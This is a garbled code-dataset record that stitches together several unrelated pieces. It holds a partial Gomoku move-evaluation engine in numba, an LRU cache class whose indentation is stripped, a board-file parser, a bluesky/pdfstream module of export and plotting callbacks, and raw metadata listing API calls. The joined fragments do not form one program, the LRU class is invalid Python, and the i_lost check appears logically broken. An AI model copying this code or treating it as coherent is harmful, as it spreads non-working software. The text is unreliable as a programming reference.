                # here if opponent_line_length_back == 5, skipped_2 will be 0 and this flag won't be True
                # but it do not affect our final result, because we have to block this no matter if it's open
                # check if we have to block this
                if opponent_line_length_back == 5:
                    if (skipped_2 == 0) or (skipped_2 == 6-opponent_line_length_no_skip):
                        final_single_move[0,0] = r
                        final_single_move[0,1] = c
                        force_to_block = True
                if force_to_block == False:
                    # if I will win after this move, I won't consider other moves
                    if forward_my_open == True and my_line_length == 4:
                        my_hard_4 += 1
                    if backward_my_open == True and my_line_length_back == 4:
                        my_hard_4 += 1
                    if my_hard_4 >= 2:
                        final_single_move[0,0] = r
                        final_single_move[0,1] = c
                        exist_will_win_move = True
                if force_to_block == False and exist_will_win_move == False:
                    # compute the interest_value for other moves
                    # if any line length >= 5, it's an overline so skipped
                    if (forward_my_open == True) and (my_line_length < 5):
                        interest_value += my_line_length ** 4
                    if (backward_my_open == True) and (my_line_length_back < 5):
                        interest_value += my_line_length_back ** 4
                    if (forward_opponent_open == True) and (opponent_line_length < 5):
                        interest_value += opponent_line_length ** 4
                    if (backward_opponent_open == True) and (opponent_line_length_back < 5):
                        interest_value += opponent_line_length_back ** 4
                # if (r,c) == (5,5):
                #     print("(dr,dc) =", dr,dc)
                #     print('forward_my_open', forward_my_open, "my_line_length", my_line_length)
                #     print('backward_my_open', backward_my_open,"my_line_length_back", my_line_length_back)
                #     print('forward_opponent_open',forward_opponent_open,'opponent_line_length',opponent_line_length)
                #     print('backward_opponent_open',backward_opponent_open,'opponent_line_length_back',opponent_line_length_back)
                #     print("interest_value=", interest_value)
            # after looking at all directions, record the total interest_value of this move
            move_interest_values[r, c] += interest_value
            if interest_value > 256: # one (length_4) ** 4, highly interesting move
                n_moves += 1
    # all moves have been investigated now see if we have to block first
    if force_to_block == True or exist_will_win_move == True:
        if verbose == True:
            print(final_single_move[0,0], final_single_move[0,1], "Only One")
        return final_single_move
    else:
        flattened_interest = move_interest_values.ravel()
        # The interest value > 250 means at least one length_4 or three length_3 which make it highly interesting
        #n_high_interest_moves = np.sum(flattened_interest > 266) # did it in the loop
        if n_moves > empty_spots_left:
            n_moves = empty_spots_left
        high_interest_idx = np.argsort(flattened_interest)[-n_moves:][::-1]
        interested_moves = np.empty(n_moves*2, dtype=np.int64).reshape(n_moves, 2)
        interested_moves[:,0] = high_interest_idx // board_size
        interested_moves[:,1] = high_interest_idx % board_size
        if verbose == True:
            print("There are", n_moves, "interested_moves")
            for i in range(n_moves):
                print(interested_moves[i,0],interested_moves[i,1],' : ', flattened_interest[high_interest_idx[i]])
        return interested_moves
@numba.jit(nopython=True,nogil=True)
def i_win(state, last_move, player):
    """Return True when last_move completed exactly five in a row for player."""
    row, col = last_move
    # four axis directions; the opposite of each is covered by the backward walk
    for dr, dc in ((1,1), (1,0), (0,1), (1,-1)):
        count = 1  # the stone at last_move itself
        # walk forward along (dr, dc), counting consecutive friendly stones
        rr = row
        cc = col
        for _ in range(5):
            rr += dr
            cc += dc
            if rr < 0 or rr >= board_size or cc < 0 or cc >= board_size:
                break
            if state[rr, cc] != player:
                break
            count += 1
        # walk backward along (-dr, -dc) for the remaining budget
        rr = row
        cc = col
        for _ in range(6 - count):
            rr -= dr
            cc -= dc
            if rr < 0 or rr >= board_size or cc < 0 or cc >= board_size:
                break
            if state[rr, cc] != player:
                break
            count += 1
        if count == 5:
            return True  # exactly 5 in a row
    return False
@numba.jit(nopython=True,nogil=True)
def i_lost(state, player):
    """Return True when the opponent (-player) has a five-in-a-row on the board."""
    for row in range(board_size):
        for col in range(board_size):
            if state[row, col] != 0:
                continue
            # an empty spot adjacent to an opponent five means the line already exists
            if i_win(state, (row, col), -player):
                return True
    return False
@numba.jit(nopython=True,nogil=True)
def i_will_win(state, last_move, player):
    """ Return true if I will win next step if the opponent don't have 4-in-a-row.
    Winning Conditions:
        1. 5 in a row.
        2. 4 in a row with both end open. (free 4)
        3. 4 in a row with one missing stone x 2 (hard 4 x 2)
    """
    r, c = last_move
    # try all 4 directions, the other 4 is equivalent
    directions = [(1,1), (1,0), (0,1), (1,-1)]
    n_hard_4 = 0 # number of hard 4s found
    for dr, dc in directions:
        line_length = 1 # last_move
        # try to extend in the positive direction (max 5 times to check overline)
        ext_r = r
        ext_c = c
        skipped_1 = 0
        for i in range(5):
            ext_r += dr
            ext_c += dc
            if ext_r < 0 or ext_r >= board_size or ext_c < 0 or ext_c >= board_size:
                break
            elif state[ext_r, ext_c] == player:
                line_length += 1
            elif skipped_1 == 0 and state[ext_r, ext_c] == 0:
                skipped_1 = i+1 # allow one skip and record the position of the skip
            else:
                break
        # try to extend in the opposite direction
        ext_r = r
        ext_c = c
        skipped_2 = 0
        # the backward counting starts at the furthest "unskipped" stone
        if skipped_1 != 0:
            line_length_back = skipped_1
        else:
            line_length_back = line_length
        line_length_no_skip = line_length_back
        for i in range(6-line_length_back):
            ext_r -= dr
            ext_c -= dc
            if ext_r < 0 or ext_r >= board_size or ext_c < 0 or ext_c >= board_size:
                break
            elif state[ext_r, ext_c] == player:
                line_length_back += 1
            elif skipped_2 == 0 and state[ext_r, ext_c] == 0:
                skipped_2 = i + 1
            else:
                break
        if line_length_back == 6:
            # we found 6 stones in a row, this is overline, skip this entire line
            continue
        elif line_length_back == 5:
            if (skipped_2 == 0) or (skipped_2 == (6-line_length_no_skip)):
                # we found 5 stones in a row, because the backward counting is not skipped in the middle
                return True
            # else there is an empty spot in the middle of 6 stones, it's not a hard 4 any more
        elif line_length_back == 4:
            # here we have only 4 stones, if skipped in back count, it's a hard 4
            if skipped_2 != 0:
                n_hard_4 += 1 # backward hard 4
                if n_hard_4 == 2:
                    return True # two hard 4
        # here we check if there's a hard 4 in the forward direction
        # extend the forward line to the furthest "unskipped" stone
        if skipped_2 == 0:
            line_length += line_length_back - line_length_no_skip
        else:
            line_length += skipped_2 - 1
        # hard 4 only if forward length is 4, if forward reaches 5 or more, it's going to be overline
        if line_length == 4 and skipped_1 != 0:
            n_hard_4 += 1 # forward hard 4
            if n_hard_4 == 2:
                return True # two hard 4 or free 4
    return False
from collections import OrderedDict
class LRU(OrderedDict):
'Limit size, evicting the least recently looked-up key when full'
def __init__(self, maxsize=128):
self.maxsize = maxsize
super().__init__()
def __getitem__(self, key):
value = super().__getitem__(key)
self.move_to_end(key)
return value
def __setitem__(self, key, value):
if key in self:
self.move_to_end(key)
super().__setitem__(key, value)
if len(self) > self.maxsize:
oldest = next(iter(self))
del self[oldest]
def read_board_state(f, size=None):
    """Parse a text rendering of a board from the file at path ``f``.

    Each board row looks like ``<row index>| x o - ...`` where lowercase
    ``x``/``o`` are black/white stones, the uppercase letter (``X``/``O``)
    marks the last move, and ``-`` is an empty spot.  Lines without ``|``
    and rows whose stone count does not match the board size are skipped.

    Parameters
    ----------
    f : str or path-like
        Path of the text file to read.
    size : int, optional
        Board size (number of columns per row).  Defaults to the module-level
        ``board_size``; passing it explicitly generalizes the parser to other
        board sizes without touching the global.

    Returns
    -------
    list
        ``[board, last_move, playing, size]`` where ``board`` is
        ``[black_stones, white_stones]`` (lists of ``(row, col)`` tuples),
        ``last_move`` is the position of the capitalized stone (or None),
        and ``playing`` is set to 0 when the last move was black ('X'),
        1 when it was white ('O').
    """
    if size is None:
        size = board_size
    # defaults
    black_stones = []
    white_stones = []
    board = [black_stones, white_stones]
    last_move = None
    playing = 0
    # read and parse board; use a context manager so the handle is always closed
    # (the original leaked the file object returned by open())
    with open(f) as handle:
        for line in handle:
            if '|' not in line:
                continue
            line_idx, contents = line.split('|', maxsplit=1)
            row_i = int(line_idx)
            stones = contents.split()
            if len(stones) != size:
                continue
            for col_j, s in enumerate(stones):
                if s == 'x':
                    black_stones.append((row_i, col_j))
                elif s == 'X':
                    # uppercase = the most recent move
                    black_stones.append((row_i, col_j))
                    last_move = (row_i, col_j)
                    playing = 0
                elif s == 'o':
                    white_stones.append((row_i, col_j))
                elif s == 'O':
                    white_stones.append((row_i, col_j))
                    last_move = (row_i, col_j)
                    playing = 1
                elif s == '-':
                    pass
                else:
                    print(f'found unknown stone: {s}')
    board_state = [board, last_move, playing, size]
    return board_state
"numpy.argmax",
"numpy.empty",
"numpy.zeros",
"numpy.argsort",
"numba.jit",
"numpy.array"
] | [((8858, 8894), 'numba.jit', 'numba.jit', ([], {'nopython': '(True)', 'nogil': '(True)'}), '(nopython=True, nogil=True)\n', (8867, 8894), False, 'import numba\n'), ((20434, 20470), 'numba.jit', 'numba.jit', ([], {'nopython': '(True)', 'nogil': '(True)'}), '(nopython=True, nogil=True)\n', (20443, 20470), False, 'import numba\n'), ((21646, 21682), 'numba.jit', 'numba.jit', ([], {'nopython': '(True)', 'nogil': '(True)'}), '(nopython=True, nogil=True)\n', (21655, 21682), False, 'import numba\n'), ((21889, 21925), 'numba.jit', 'numba.jit', ([], {'nopython': '(True)', 'nogil': '(True)'}), '(nopython=True, nogil=True)\n', (21898, 21925), False, 'import numba\n'), ((6901, 6921), 'numpy.argmax', 'np.argmax', (['predict_y'], {}), '(predict_y)\n', (6910, 6921), True, 'import numpy as np\n'), ((9732, 9759), 'numpy.zeros', 'np.zeros', (['(2)'], {'dtype': 'np.int64'}), '(2, dtype=np.int64)\n', (9740, 9759), True, 'import numpy as np\n'), ((411, 458), 'numpy.zeros', 'np.zeros', (['(board_size ** 4 * 3)'], {'dtype': 'np.float16'}), '(board_size ** 4 * 3, dtype=np.float16)\n', (419, 458), True, 'import numpy as np\n'), ((543, 586), 'numpy.zeros', 'np.zeros', (['(board_size ** 2)'], {'dtype': 'np.float32'}), '(board_size ** 2, dtype=np.float32)\n', (551, 586), True, 'import numpy as np\n'), ((1749, 1789), 'numpy.zeros', 'np.zeros', (['(board_size ** 2)'], {'dtype': 'np.int8'}), '(board_size ** 2, dtype=np.int8)\n', (1757, 1789), True, 'import numpy as np\n'), ((19899, 19929), 'numpy.argsort', 'np.argsort', (['flattened_interest'], {}), '(flattened_interest)\n', (19909, 19929), True, 'import numpy as np\n'), ((19974, 20011), 'numpy.empty', 'np.empty', (['(n_moves * 2)'], {'dtype': 'np.int64'}), '(n_moves * 2, dtype=np.int64)\n', (19982, 20011), True, 'import numpy as np\n'), ((6674, 6693), 'numpy.array', 'np.array', (['predict_y'], {}), '(predict_y)\n', (6682, 6693), True, 'import numpy as np\n')] |
import copy
import typing as tp
from pathlib import Path
import numpy as np
import pandas as pd
import yaml
from bluesky.callbacks import CallbackBase
from bluesky.callbacks.best_effort import LivePlot, LiveScatter
from bluesky.callbacks.broker import LiveImage
from databroker.v2 import Broker
from event_model import unpack_event_page
from matplotlib import pyplot as plt
from matplotlib.axes import Axes
from matplotlib.widgets import Slider
from pyFAI.io.ponifile import PoniFile
from suitcase.tiff_series import Serializer as TiffSerializer
from xpdview.waterfall import Waterfall
import pdfstream.callbacks.from_descriptor as fd
import pdfstream.callbacks.from_start as fs
import pdfstream.io as io
from pdfstream.vend.formatters import SpecialStr
class ArrayExporter(CallbackBase):
    """Base callback that locates 1d array fields in events and exports them.

    Subclasses implement ``export`` to write one event's data to disk; this
    base class manages the output directory, the file-name template, and the
    bookkeeping of start/descriptor documents.
    """
    _file_suffix = ""
    _file_stem = "{descriptor[name]}-{field}-{event[seq_num]}"

    def __init__(self, directory: str, *, file_prefix: str, data_keys: list = None):
        super().__init__()
        self.directory = Path(directory)
        self.directory.mkdir(parents=True, exist_ok=True)
        self._file_prefix = file_prefix
        self._file_template = ""
        self.data_keys = data_keys
        self.start_doc = {}
        self.descriptor_doc = {}
        self._indeps = set()
        self._indep2unit = {}

    def start(self, doc):
        # remember the start document and the plan's independent variables
        self.start_doc = doc
        self._indeps = fs.get_indeps(doc, exclude={"time"})
        super().start(doc)

    def descriptor(self, doc):
        # discover the 1d array fields lazily when the user did not name them
        if not self.data_keys:
            self.data_keys = list(fd.yield_1d_array(doc["data_keys"]))
        self.descriptor_doc = doc
        self._indep2unit = fd.get_units(doc["data_keys"], self._indeps)
        super().descriptor(doc)

    def event(self, doc):
        # rebuild the template per event so the independent values are embedded
        indep_str = fd.get_indep_str(doc["data"], self._indep2unit)
        self._file_template = SpecialStr(
            self._file_prefix + indep_str + self._file_stem + self._file_suffix
        )
        self.export(doc)
        super().event(doc)

    def event_page(self, doc):
        for single_event in unpack_event_page(doc):
            self.event(single_event)

    def stop(self, doc):
        super().stop(doc)

    def export(self, doc):
        # hook for subclasses: write the data of one event to disk
        pass
class NumpyExporter(ArrayExporter):
    """Export each 1d array field of an event to its own ``.npy`` file."""
    _file_suffix = ".npy"

    def export(self, doc):
        for field in self.data_keys:
            array = doc["data"][field]
            name = self._file_template.format(
                start=self.start_doc, descriptor=self.descriptor_doc, event=doc, field=field
            )
            np.save(str(self.directory.joinpath(name)), array)
class StackedNumpyExporter(ArrayExporter):
    """Export the column-wise stack of all 1d array fields to one ``.npy`` file."""
    _file_suffix = ".npy"

    def export(self, doc):
        stacked = np.stack([doc["data"][key] for key in self.data_keys], axis=-1)
        joined_field = "_".join(self.data_keys)
        name = self._file_template.format(
            start=self.start_doc, descriptor=self.descriptor_doc, event=doc, field=joined_field
        )
        np.save(str(self.directory.joinpath(name)), stacked)
class StackedNumpyTextExporter(CallbackBase):
    """Export groups of fields as column-stacked text files.

    The positional ``args`` come in triplets: directory to export into,
    tuple of data keys to stack as columns, and file suffix.  Each triplet
    produces one file per event.
    """
    _file_stem = "{descriptor[name]}-{event[seq_num]}"

    def __init__(self, file_prefix: str, *args, no_single_value: bool = True):
        """``args`` is a flat sequence of (directory, data key tuple, suffix) triplets."""
        super().__init__()
        self._no_single_value = no_single_value
        self._file_prefix = file_prefix
        self._file_template = ""
        self.directories = tuple(map(Path, args[::3]))
        self.data_keys = args[1::3]
        self.file_suffixes = args[2::3]
        self.start_doc = {}
        self.descriptor_doc = {}
        self._indeps = set()
        self._indep2unit = {}

    def start(self, doc):
        self.start_doc = doc
        self._indeps = fs.get_indeps(doc, exclude={"time"})
        super().start(doc)

    def descriptor(self, doc):
        self.descriptor_doc = doc
        self._indep2unit = fd.get_units(doc["data_keys"], self._indeps)
        super().descriptor(doc)

    def event(self, doc):
        # rebuild the file-name template with the independent values embedded
        indep_str = fd.get_indep_str(doc["data"], self._indep2unit)
        self._file_template = SpecialStr(self._file_prefix + indep_str + self._file_stem)
        self.export(doc)
        super().event(doc)

    def event_page(self, doc):
        for single_event in unpack_event_page(doc):
            self.event(single_event)

    def stop(self, doc):
        super().stop(doc)

    def export(self, doc):
        for folder, key_tup, suffix in zip(self.directories, self.data_keys, self.file_suffixes):
            columns = np.stack([doc["data"][key] for key in key_tup], axis=-1)
            # optionally skip outputs that would contain a single row only
            if columns.ndim == 2 and columns.shape[0] <= 1 and self._no_single_value:
                continue
            name = self._file_template.format(
                start=self.start_doc, descriptor=self.descriptor_doc, event=doc
            )
            name += suffix
            folder.mkdir(exist_ok=True, parents=True)
            header = " ".join(key_tup)
            np.savetxt(str(folder.joinpath(name)), columns, header=header)
class DataFrameExporter(ArrayExporter):
    """Export the 1d array fields of an event as columns of a ``.csv`` file."""
    _file_suffix = ".csv"

    def export(self, doc):
        columns = {key: pd.Series(doc["data"][key]) for key in self.data_keys}
        frame = pd.DataFrame(data=columns)
        name = self._file_template.format(
            start=self.start_doc, descriptor=self.descriptor_doc, event=doc, field="data"
        )
        frame.to_csv(str(self.directory.joinpath(name)))
class MyLiveImage(LiveImage):
    """LiveImage that coerces incoming data to an ndarray and can show its figure."""

    def update(self, data):
        # accept any array-like input by converting it up front
        super().update(np.asarray(data))

    def show(self):
        self.cs._fig.show()
class LiveMaskedImage(LiveImage):
    """Live image display of an image field combined with a mask field.

    The mask is read from ``msk_field`` of the same event and applied as a
    numpy masked array before the image is drawn.
    """
    def __init__(self, field: str, msk_field: str, *, cmap: str, norm: tp.Callable = None,
                 limit_func: tp.Callable = None, auto_draw: bool = True, interpolation: str = None,
                 window_title: str = None, db: Broker = None):
        self.msk_field = msk_field
        self.msk_array = None
        # note: the local `auto_draw` keyword is forwarded as LiveImage's `auto_redraw`
        super(LiveMaskedImage, self).__init__(
            field, cmap=cmap, norm=norm, limit_func=limit_func,
            auto_redraw=auto_draw, interpolation=interpolation, window_title=window_title, db=db
        )
    def event(self, doc):
        # super(LiveImage, self) deliberately skips LiveImage's own event handling
        # so that update() below receives the masked array instead of the raw field
        super(LiveImage, self).event(doc)
        data_arr = np.ma.masked_array(doc["data"][self.field], doc["data"][self.msk_field])
        self.update(data_arr)
    def show(self):
        self.cs._fig.show()
class MyWaterfall(Waterfall):
    """An adaptation of Waterfall that draws on a caller-supplied Axes instead of
    creating its own Figure.

    Parameters
    ----------
    xlabel : str
        Label of the x axis.
    ylabel : str
        Label of the y axis.
    ax : Axes
        The axes to draw the waterfall into; its figure hosts the offset sliders.
    kwargs :
        Extra keyword arguments kept for the plotting calls.
    """
    def __init__(self, *, xlabel: str, ylabel: str, ax: Axes, **kwargs):
        # super(Waterfall, self) deliberately skips Waterfall.__init__ —
        # presumably because it would build its own figure; verify against xpdview
        super(Waterfall, self).__init__()
        self.ax = ax
        self.fig = self.ax.figure
        self.canvas = self.fig.canvas
        self.kwargs = kwargs
        self.x_array_list = []
        self.y_array_list = []
        # callback for showing legend
        self.canvas.mpl_connect("pick_event", self.on_plot_hover)
        self.key_list = []
        self.unit = (xlabel, ylabel)
        # add sliders, which store information
        self.ydist = 0
        self.xdist = 0
        y_offset_slider_ax = self.fig.add_axes([0.15, 0.95, 0.25, 0.035])
        self.y_offset_slider = Slider(
            y_offset_slider_ax,
            "y-offset",
            0.0,
            1.0,
            valinit=0.1,
            valfmt="%1.2f",
        )
        self.y_offset_slider.on_changed(self.update_y_offset)
        x_offset_slider_ax = self.fig.add_axes([0.6, 0.95, 0.25, 0.035])
        self.x_offset_slider = Slider(
            x_offset_slider_ax,
            "x-offset",
            0.0,
            1.0,
            valinit=0.,
            valfmt="%1.2f",
        )
        self.x_offset_slider.on_changed(self.update_x_offset)
class LiveWaterfall(CallbackBase):
    """Live waterfall plot of one-dimensional data.

    Parameters
    ----------
    x : str
        Field name of the independent variable.
    y : str
        Field name of the dependent variable.
    xlabel : str
        Axis label shown for x.
    ylabel : str
        Axis label shown for y.
    ax : Axes
        The axes to plot into.
    kwargs :
        Extra keyword arguments for matplotlib.pyplot.plot.
    """

    def __init__(self, x: str, y: str, *, xlabel: str, ylabel: str, ax: Axes, **kwargs):
        super().__init__()
        self.x = x
        self.y = y
        self.ax = ax
        self.waterfall = MyWaterfall(xlabel=xlabel, ylabel=ylabel, ax=self.ax, **kwargs)

    def start(self, doc):
        super().start(doc)
        # begin every run with an empty waterfall
        self.waterfall.clear()

    def event(self, doc):
        super().event(doc)
        pair = (doc["data"][self.x], doc["data"][self.y])
        self.update(doc['seq_num'], pair)

    def update(self, key: str, int_data: tp.Tuple[np.ndarray, np.ndarray]):
        self.waterfall.update(key_list=[key], int_data_list=[int_data])

    def show(self):
        self.ax.figure.show()
class SmartScalarPlot(CallbackBase):
    """Plot of a scalar variable that picks its backend per run: LivePlot for one
    independent variable, LiveScatter for two, LivePlot against time otherwise."""

    def __init__(self, y: str, *, ax: Axes = None, ylabel: str = None, **kwargs):
        super().__init__()
        self.y = y
        if ax is None:
            ax = plt.figure().add_subplot(111)
        self.ax = ax
        self.ylabel = ylabel
        self.kwargs = kwargs
        self.callback = None

    def start(self, doc):
        self.ax.cla()
        super().start(doc)
        self.clear()
        # choose the plotting backend from the number of independent variables
        indeps = fs.get_indeps(doc, exclude={"time"})
        n_indep = len(indeps)
        if n_indep == 1:
            self.callback = LivePlot(self.y, x=indeps.pop(), ax=self.ax, **self.kwargs)
        elif n_indep == 2:
            self.callback = LiveScatter(indeps.pop(), indeps.pop(), self.y, ax=self.ax, **self.kwargs)
        else:
            self.callback = LivePlot(self.y, ax=self.ax, **self.kwargs)
        self.callback.start(doc)

    def descriptor(self, doc):
        super().descriptor(doc)
        self.callback.descriptor(doc)

    def event(self, doc):
        super().event(doc)
        self.callback.event(doc)
        if self.ylabel:
            self.ax.set_ylabel(self.ylabel)

    def stop(self, doc):
        super().stop(doc)
        self.callback.stop(doc)

    def clear(self):
        self.ax.cla()
        self.callback = None

    def show(self):
        self.ax.figure.show()
class MyTiffSerializer(TiffSerializer):
    """A TiffSerializer that allows specific data keys to be exported.

    If ``data_keys`` is given, only those fields of each event are written;
    the file prefix is extended per event with the independent-variable values.
    """
    def __init__(self, directory, file_prefix: SpecialStr, data_keys=None, astype='uint32',
                 bigtiff=False, byteorder=None, imagej=False, **kwargs):
        super(MyTiffSerializer, self).__init__(directory, file_prefix=file_prefix, astype=astype,
                                               bigtiff=bigtiff, byteorder=byteorder, imagej=imagej, **kwargs)
        self.data_keys = data_keys
        self._indeps = frozenset()
        self._indep2unit = dict()
    def start(self, doc):
        self._indeps = fs.get_indeps(doc, exclude={"time"})
        return super(MyTiffSerializer, self).start(doc)
    def descriptor(self, doc):
        self._indep2unit = fd.get_units(doc["data_keys"], self._indeps)
        return super(MyTiffSerializer, self).descriptor(doc)
    def event(self, doc):
        # add indep
        # temporarily swap in a prefix that embeds the independent-variable values
        _file_prefix = copy.copy(self._file_prefix)
        indep_str = fd.get_indep_str(doc["data"], self._indep2unit)
        self._file_prefix = SpecialStr(_file_prefix + indep_str)
        # select data key
        if not self.data_keys:
            returned = super(MyTiffSerializer, self).event(doc)
        else:
            # shallow-copy the document so the caller's event dict is not mutated
            doc = dict(doc)
            doc["data"] = {k: v for k, v in doc["data"].items() if k in self.data_keys}
            returned = super(MyTiffSerializer, self).event(doc)
        # go back to original data key
        self._file_prefix = _file_prefix
        return returned
class CalibrationExporter(CallbackBase):
    """Export the calibration metadata in the start document to a pyFAI .poni file.

    Parameters
    ----------
    directory : str
        Output directory; ``~`` is expanded and the directory is created if missing.
    file_prefix : str
        Template for the file name, formatted with the start document; trailing
        underscores are stripped from the result.
    md_key : str
        Key in the start document that holds the calibration metadata.
    """

    def __init__(self, directory: str, file_prefix: str = "start[uid]_", md_key: str = "calibration_md"):
        super(CalibrationExporter, self).__init__()
        self._directory = Path(directory).expanduser()
        # fix: the original called mkdir twice; once is enough
        self._directory.mkdir(exist_ok=True, parents=True)
        self._file_prefix = SpecialStr(file_prefix)
        self._md_key = md_key

    def start(self, doc):
        if self._md_key in doc:
            calibration_md = doc[self._md_key]
            pf = PoniFile()
            pf.read_from_dict(calibration_md)
            file_prefix = self._file_prefix.format(start=doc)
            file_name = file_prefix.strip("_")
            file_path = self._directory.joinpath(file_name).with_suffix(".poni")
            with file_path.open("w") as f:
                pf.write(f)
        else:
            io.server_message("Missing 'calibration_md' in the start.")
        return super(CalibrationExporter, self).start(doc)
class YamlSerializer(CallbackBase):
    """Dump each start document into a ``.yaml`` file named after it.

    Parameters
    ----------
    directory : str
        Output directory; ``~`` is expanded and the directory is created if missing.
    file_prefix : str
        Template for the file name, formatted with the start document; trailing
        underscores are stripped from the result.
    """

    def __init__(self, directory: str, file_prefix: str = "start[uid]_"):
        super().__init__()
        self._directory = Path(directory).expanduser()
        self._directory.mkdir(exist_ok=True, parents=True)
        self._file_prefix = file_prefix

    def start(self, doc):
        stem = self._file_prefix.format(start=doc).strip("_")
        target = self._directory.joinpath(stem).with_suffix(".yaml")
        with target.open("w") as f:
            yaml.dump(doc, f)
        return super().start(doc)
| [
"matplotlib.widgets.Slider",
"yaml.dump",
"pdfstream.callbacks.from_descriptor.yield_1d_array",
"pathlib.Path",
"matplotlib.pyplot.figure",
"numpy.ma.masked_array",
"bluesky.callbacks.best_effort.LivePlot",
"pandas.DataFrame",
"event_model.unpack_event_page",
"pyFAI.io.ponifile.PoniFile",
"numpy... | [((1110, 1125), 'pathlib.Path', 'Path', (['directory'], {}), '(directory)\n', (1114, 1125), False, 'from pathlib import Path\n'), ((1491, 1527), 'pdfstream.callbacks.from_start.get_indeps', 'fs.get_indeps', (['doc'], {'exclude': "{'time'}"}), "(doc, exclude={'time'})\n", (1504, 1527), True, 'import pdfstream.callbacks.from_start as fs\n'), ((1769, 1813), 'pdfstream.callbacks.from_descriptor.get_units', 'fd.get_units', (["doc['data_keys']", 'self._indeps'], {}), "(doc['data_keys'], self._indeps)\n", (1781, 1813), True, 'import pdfstream.callbacks.from_descriptor as fd\n'), ((1912, 1959), 'pdfstream.callbacks.from_descriptor.get_indep_str', 'fd.get_indep_str', (["doc['data']", 'self._indep2unit'], {}), "(doc['data'], self._indep2unit)\n", (1928, 1959), True, 'import pdfstream.callbacks.from_descriptor as fd\n'), ((1990, 2069), 'pdfstream.vend.formatters.SpecialStr', 'SpecialStr', (['(self._file_prefix + indep_str + self._file_stem + self._file_suffix)'], {}), '(self._file_prefix + indep_str + self._file_stem + self._file_suffix)\n', (2000, 2069), False, 'from pdfstream.vend.formatters import SpecialStr\n'), ((2216, 2238), 'event_model.unpack_event_page', 'unpack_event_page', (['doc'], {}), '(doc)\n', (2233, 2238), False, 'from event_model import unpack_event_page\n'), ((3117, 3190), 'numpy.stack', 'np.stack', (["[doc['data'][data_key] for data_key in self.data_keys]"], {'axis': '(-1)'}), "([doc['data'][data_key] for data_key in self.data_keys], axis=-1)\n", (3125, 3190), True, 'import numpy as np\n'), ((4355, 4391), 'pdfstream.callbacks.from_start.get_indeps', 'fs.get_indeps', (['doc'], {'exclude': "{'time'}"}), "(doc, exclude={'time'})\n", (4368, 4391), True, 'import pdfstream.callbacks.from_start as fs\n'), ((4542, 4586), 'pdfstream.callbacks.from_descriptor.get_units', 'fd.get_units', (["doc['data_keys']", 'self._indeps'], {}), "(doc['data_keys'], self._indeps)\n", (4554, 4586), True, 'import pdfstream.callbacks.from_descriptor as fd\n'), ((4696, 
4743), 'pdfstream.callbacks.from_descriptor.get_indep_str', 'fd.get_indep_str', (["doc['data']", 'self._indep2unit'], {}), "(doc['data'], self._indep2unit)\n", (4712, 4743), True, 'import pdfstream.callbacks.from_descriptor as fd\n'), ((4774, 4833), 'pdfstream.vend.formatters.SpecialStr', 'SpecialStr', (['(self._file_prefix + indep_str + self._file_stem)'], {}), '(self._file_prefix + indep_str + self._file_stem)\n', (4784, 4833), False, 'from pdfstream.vend.formatters import SpecialStr\n'), ((4991, 5013), 'event_model.unpack_event_page', 'unpack_event_page', (['doc'], {}), '(doc)\n', (5008, 5013), False, 'from event_model import unpack_event_page\n'), ((6104, 6128), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': '_data'}), '(data=_data)\n', (6116, 6128), True, 'import pandas as pd\n'), ((6500, 6516), 'numpy.asarray', 'np.asarray', (['data'], {}), '(data)\n', (6510, 6516), True, 'import numpy as np\n'), ((7328, 7400), 'numpy.ma.masked_array', 'np.ma.masked_array', (["doc['data'][self.field]", "doc['data'][self.msk_field]"], {}), "(doc['data'][self.field], doc['data'][self.msk_field])\n", (7346, 7400), True, 'import numpy as np\n'), ((8253, 8330), 'matplotlib.widgets.Slider', 'Slider', (['y_offset_slider_ax', '"""y-offset"""', '(0.0)', '(1.0)'], {'valinit': '(0.1)', 'valfmt': '"""%1.2f"""'}), "(y_offset_slider_ax, 'y-offset', 0.0, 1.0, valinit=0.1, valfmt='%1.2f')\n", (8259, 8330), False, 'from matplotlib.widgets import Slider\n'), ((8581, 8658), 'matplotlib.widgets.Slider', 'Slider', (['x_offset_slider_ax', '"""x-offset"""', '(0.0)', '(1.0)'], {'valinit': '(0.0)', 'valfmt': '"""%1.2f"""'}), "(x_offset_slider_ax, 'x-offset', 0.0, 1.0, valinit=0.0, valfmt='%1.2f')\n", (8587, 8658), False, 'from matplotlib.widgets import Slider\n'), ((10819, 10855), 'pdfstream.callbacks.from_start.get_indeps', 'fs.get_indeps', (['doc'], {'exclude': "{'time'}"}), "(doc, exclude={'time'})\n", (10832, 10855), True, 'import pdfstream.callbacks.from_start as fs\n'), ((12402, 12438), 
'pdfstream.callbacks.from_start.get_indeps', 'fs.get_indeps', (['doc'], {'exclude': "{'time'}"}), "(doc, exclude={'time'})\n", (12415, 12438), True, 'import pdfstream.callbacks.from_start as fs\n'), ((12554, 12598), 'pdfstream.callbacks.from_descriptor.get_units', 'fd.get_units', (["doc['data_keys']", 'self._indeps'], {}), "(doc['data_keys'], self._indeps)\n", (12566, 12598), True, 'import pdfstream.callbacks.from_descriptor as fd\n'), ((12730, 12758), 'copy.copy', 'copy.copy', (['self._file_prefix'], {}), '(self._file_prefix)\n', (12739, 12758), False, 'import copy\n'), ((12779, 12826), 'pdfstream.callbacks.from_descriptor.get_indep_str', 'fd.get_indep_str', (["doc['data']", 'self._indep2unit'], {}), "(doc['data'], self._indep2unit)\n", (12795, 12826), True, 'import pdfstream.callbacks.from_descriptor as fd\n'), ((12855, 12891), 'pdfstream.vend.formatters.SpecialStr', 'SpecialStr', (['(_file_prefix + indep_str)'], {}), '(_file_prefix + indep_str)\n', (12865, 12891), False, 'from pdfstream.vend.formatters import SpecialStr\n'), ((13711, 13734), 'pdfstream.vend.formatters.SpecialStr', 'SpecialStr', (['file_prefix'], {}), '(file_prefix)\n', (13721, 13734), False, 'from pdfstream.vend.formatters import SpecialStr\n'), ((5296, 5367), 'numpy.stack', 'np.stack', (["[doc['data'][data_key] for data_key in data_key_tup]"], {'axis': '(-1)'}), "([doc['data'][data_key] for data_key in data_key_tup], axis=-1)\n", (5304, 5367), True, 'import numpy as np\n'), ((6026, 6058), 'pandas.Series', 'pd.Series', (["doc['data'][data_key]"], {}), "(doc['data'][data_key])\n", (6035, 6058), True, 'import pandas as pd\n'), ((10525, 10537), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (10535, 10537), True, 'from matplotlib import pyplot as plt\n'), ((13947, 13957), 'pyFAI.io.ponifile.PoniFile', 'PoniFile', ([], {}), '()\n', (13955, 13957), False, 'from pyFAI.io.ponifile import PoniFile\n'), ((14291, 14350), 